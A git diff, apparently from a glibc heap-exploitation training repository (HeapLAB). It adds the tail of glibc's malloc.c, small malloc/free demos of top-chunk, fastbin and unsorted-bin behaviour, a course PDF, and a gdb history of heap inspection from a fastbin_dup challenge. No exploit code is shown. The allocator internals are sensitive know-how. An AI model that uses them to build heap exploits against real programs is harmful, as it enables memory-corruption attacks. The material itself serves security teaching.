+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  if (!checked_request2size (bytes, &nb))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
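+
+  /*
+     Illustration (editor's sketch, not upstream text): memalign (0x1000,
+     0x100) asks _int_malloc for roughly 0x110 + 0x1000 + MINSIZE bytes,
+     picks the first 0x1000-aligned spot that leaves at least MINSIZE of
+     leading space, frees that leader, and finally frees any tail beyond
+     the 0x110 bytes actually needed.
+   */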
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    {
+      /* Find an aligned spot inside chunk.  Since we need to give back
+         leading space in a chunk of at least MINSIZE, if the first
+         calculation places us at a spot with less than MINSIZE leader,
+         we can move to the next aligned spot -- we've allocated enough
+         total room so that this is always possible.  */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          set_prev_size (newp, prev_size (p) + leadsize);
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Ensure all blocks are consolidated.  */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = stderr->_flags2;
+  stderr->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      __libc_lock_unlock (ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  stderr->_flags2 = old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+static __always_inline int
+do_set_trim_threshold (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_trim_threshold, 3, value, mp_.trim_threshold,
+	      mp_.no_dyn_threshold);
+  mp_.trim_threshold = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static __always_inline int
+do_set_top_pad (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_top_pad, 3, value, mp_.top_pad,
+	      mp_.no_dyn_threshold);
+  mp_.top_pad = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static __always_inline int
+do_set_mmap_threshold (size_t value)
+{
+  /* Forbid setting the threshold too high.  */
+  if (value <= HEAP_MAX_SIZE / 2)
+    {
+      LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value, mp_.mmap_threshold,
+		  mp_.no_dyn_threshold);
+      mp_.mmap_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      return 1;
+    }
+  return 0;
+}
+
+static __always_inline int
+do_set_mmaps_max (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_mmap_max, 3, value, mp_.n_mmaps_max,
+	      mp_.no_dyn_threshold);
+  mp_.n_mmaps_max = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static __always_inline int
+do_set_mallopt_check (int32_t value)
+{
+  return 1;
+}
+
+static __always_inline int
+do_set_perturb_byte (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+  perturb_byte = value;
+  return 1;
+}
+
+static __always_inline int
+do_set_arena_test (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+  mp_.arena_test = value;
+  return 1;
+}
+
+static __always_inline int
+do_set_arena_max (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+  mp_.arena_max = value;
+  return 1;
+}
+
+#if USE_TCACHE
+static __always_inline int
+do_set_tcache_max (size_t value)
+{
+  if (value <= MAX_TCACHE_SIZE)
+    {
+      LIBC_PROBE (memory_tunable_tcache_max_bytes, 2, value, mp_.tcache_max_bytes);
+      mp_.tcache_max_bytes = value;
+      mp_.tcache_bins = csize2tidx (request2size(value)) + 1;
+      return 1;
+    }
+  return 0;
+}
+
+static __always_inline int
+do_set_tcache_count (size_t value)
+{
+  if (value <= MAX_TCACHE_COUNT)
+    {
+      LIBC_PROBE (memory_tunable_tcache_count, 2, value, mp_.tcache_count);
+      mp_.tcache_count = value;
+      return 1;
+    }
+  return 0;
+}
+
+static __always_inline int
+do_set_tcache_unsorted_limit (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_unsorted_limit, 2, value, mp_.tcache_unsorted_limit);
+  mp_.tcache_unsorted_limit = value;
+  return 1;
+}
+#endif
+
+static inline int
+__always_inline
+do_set_mxfast (size_t value)
+{
+  if (value <= MAX_FAST_SIZE)
+    {
+      LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+      set_max_fast (value);
+      return 1;
+    }
+  return 0;
+}
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  __libc_lock_lock (av->mutex);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  /* We must consolidate main arena before changing max_fast
+     (see definition of set_max_fast).  */
+  malloc_consolidate (av);
+
+  /* Many of these helper functions take a size_t.  We do not worry
+     about overflow here, because negative int values will wrap to
+     very large size_t values and the helpers have sufficient range
+     checking for such conversions.  Many of these helpers are also
+     used by the tunables macros in arena.c.  */
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      res = do_set_mxfast (value);
+      break;
+
+    case M_TRIM_THRESHOLD:
+      res = do_set_trim_threshold (value);
+      break;
+
+    case M_TOP_PAD:
+      res = do_set_top_pad (value);
+      break;
+
+    case M_MMAP_THRESHOLD:
+      res = do_set_mmap_threshold (value);
+      break;
+
+    case M_MMAP_MAX:
+      res = do_set_mmaps_max (value);
+      break;
+
+    case M_CHECK_ACTION:
+      res = do_set_mallopt_check (value);
+      break;
+
+    case M_PERTURB:
+      res = do_set_perturb_byte (value);
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+	res = do_set_arena_test (value);
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+	res = do_set_arena_max (value);
+      break;
+    }
+  __libc_lock_unlock (av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM.
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+         *ptr = 0;
+      }
+   }
+
+ */
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (const char *str)
+{
+  __libc_message (do_abort, "%s\n", str);
+  __builtin_unreachable ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      __libc_lock_lock (ar_ptr->mutex);
+
+      /* Account for top chunk.  The top-most available chunk is
+	 treated specially and is never in any bin. See "initial_top"
+	 comments.  */
+      avail = chunksize (ar_ptr->top);
+      nblocks = 1;  /* Top always exists.  */
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		size_t r_size = chunksize_nomask (r);
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r_size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r_size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r_size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      size_t heap_size = 0;
+      size_t heap_mprotect_size = 0;
+      size_t heap_count = 0;
+      if (ar_ptr != &main_arena)
+	{
+	  /* Iterate over the arena heaps from back to front.  */
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  do
+	    {
+	      heap_size += heap->size;
+	      heap_mprotect_size += heap->mprotect_size;
+	      heap = heap->prev;
+	      ++heap_count;
+	    }
+	  while (heap != NULL);
+	}
+
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "\
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+		   "<aspace type=\"subheaps\" size=\"%zu\"/>\n",
+		   heap_size, heap_mprotect_size, heap_count);
+	  total_aspace += heap_size;
+	  total_aspace_mprotect += heap_mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_26)
+compat_symbol (libc, __libc_free, cfree, GLIBC_2_0);
+#endif
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.src/demo_fastbins.c b/HeapLAB/.src/demo_fastbins.c
new file mode 100644
index 0000000..a50aa1f
--- /dev/null
+++ b/HeapLAB/.src/demo_fastbins.c
@@ -0,0 +1,19 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+int main(int argc, char* argv[]) {
+
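+    /* Editor's note (not in the original demo): on a glibc without tcache
+       (pre-2.26, or a build configured without it) each malloc(1) below is
+       a 0x20-byte chunk; the three frees stack them in the 0x20 fastbin and
+       the second round of mallocs returns them in reverse order
+       (d reuses c's chunk, e reuses b's, f reuses a's). */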
+    void* a = malloc(1);
+    void* b = malloc(1);
+    void* c = malloc(1);
+
+    free(a);
+    free(b);
+    free(c);
+
+    void* d = malloc(1);
+    void* e = malloc(1);
+    void* f = malloc(1);
+
+    return 0;
+}
diff --git a/HeapLAB/.src/demo_top_chunk.c b/HeapLAB/.src/demo_top_chunk.c
new file mode 100644
index 0000000..d8e9767
--- /dev/null
+++ b/HeapLAB/.src/demo_top_chunk.c
@@ -0,0 +1,14 @@
+#include <stdlib.h>
+
+int main(int argc, char* argv[]) {
+
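+    /* Editor's note (not in the original demo): with nothing free yet every
+       request is carved straight off the top chunk; 9, 1, 0 and 24 all
+       round up to 0x20-byte chunks, while 25 crosses the alignment step and
+       becomes a 0x30-byte chunk. */
+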
+    void* a = malloc(9);
+
+    malloc(1);
+    malloc(0);
+
+    malloc(24);
+    malloc(25);
+
+    return 0;
+}
diff --git a/HeapLAB/.src/demo_unsortedbin.c b/HeapLAB/.src/demo_unsortedbin.c
new file mode 100644
index 0000000..1bfcc9e
--- /dev/null
+++ b/HeapLAB/.src/demo_unsortedbin.c
@@ -0,0 +1,16 @@
+#include <stdlib.h>
+
+int main(int argc, char* argv[]) {
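+    /* Editor's note (not in the original demo): 0x88-byte requests become
+       0x90-byte chunks, too large for the fastbins, so on a build without
+       tcache the final frees feed the unsorted bin; the malloc(0x18) guard
+       keeps b's chunk from melting back into the top chunk when it is freed
+       (a and b still coalesce with each other). */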
+    void* a = malloc(0x88);
+    void* b = malloc(0x88);
+
+    free(b);
+
+    b = malloc(0x88);
+    malloc(0x18);
+
+    free(a);
+    free(b);
+
+    return 0;
+}
diff --git a/HeapLAB/HeapLab - GLIBC Heap Exploitation.pdf b/HeapLAB/HeapLab - GLIBC Heap Exploitation.pdf
new file mode 100644
index 0000000..41b2d41
Binary files /dev/null and b/HeapLAB/HeapLab - GLIBC Heap Exploitation.pdf differ
diff --git a/HeapLAB/challenge-fastbin_dup/.gdb_history b/HeapLAB/challenge-fastbin_dup/.gdb_history
new file mode 100644
index 0000000..b2cbfcb
--- /dev/null
+++ b/HeapLAB/challenge-fastbin_dup/.gdb_history
@@ -0,0 +1,256 @@
+x &main_arena
+x/100x &main_arena
+print main_arena
+fastbins
+q
+fastbins
+fastbins
+c
+exit
+quit
+quit
+fastbins
+print main_arena
+q
+print main_arena
+q
+vis_heap_chunks 
+print main_arena
+db main_arena
+db &main_arena
+db &main_arena/100
+db &main_arena 100
+db &main_arena 1000
+x main_arena.top
+x &main_arena.top
+db &main_arena 100
+c
+fastbins
+print main_arena
+x main_arena.fasbinsY
+x &main_arena.fastbinsY
+quit
+fastbins
+x 0x7f0946700b70
+db 0x7f0946700b70 100
+q
+fastbins
+q
+fastbins
+q
+fastbinsx
+db &main_arena 100
+q
+db 0x7f2e5c845b60
+0x7f2e5c845b70 + 16
+x 0x7f2e5c845b70 + 16
+x 0x7f2e5c845b70
+x 0x7f2e5c845b70
+x 0x7f2e5c845b60
+vis_heap_chunks 
+db 0x7f0ba6e3db70
+db 0x555bdeaca000 100
+db 0x7f0ba6e3db70
